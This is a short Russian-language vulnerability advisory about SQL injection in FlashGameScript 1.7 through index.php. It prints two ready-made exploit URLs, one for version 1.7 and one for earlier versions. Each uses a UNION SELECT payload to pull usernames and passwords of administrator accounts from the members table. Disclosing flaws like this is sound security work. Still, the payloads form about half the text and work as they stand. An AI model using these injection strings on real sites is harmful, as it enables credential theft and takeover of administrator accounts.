Программа: FlashGameScript 1.7

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «func» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

Для версии 1.7:

http://whatever.com/index.php?func=member&user=’+union+select+ 0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,0, user_type+from+members+where+user_type=2/*

До версии 1.7:

http://whatever.com/index.php?func=member&user=’+union+select+ 0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,user_type+ from+members+where+user_type=2/*



Оставить мнение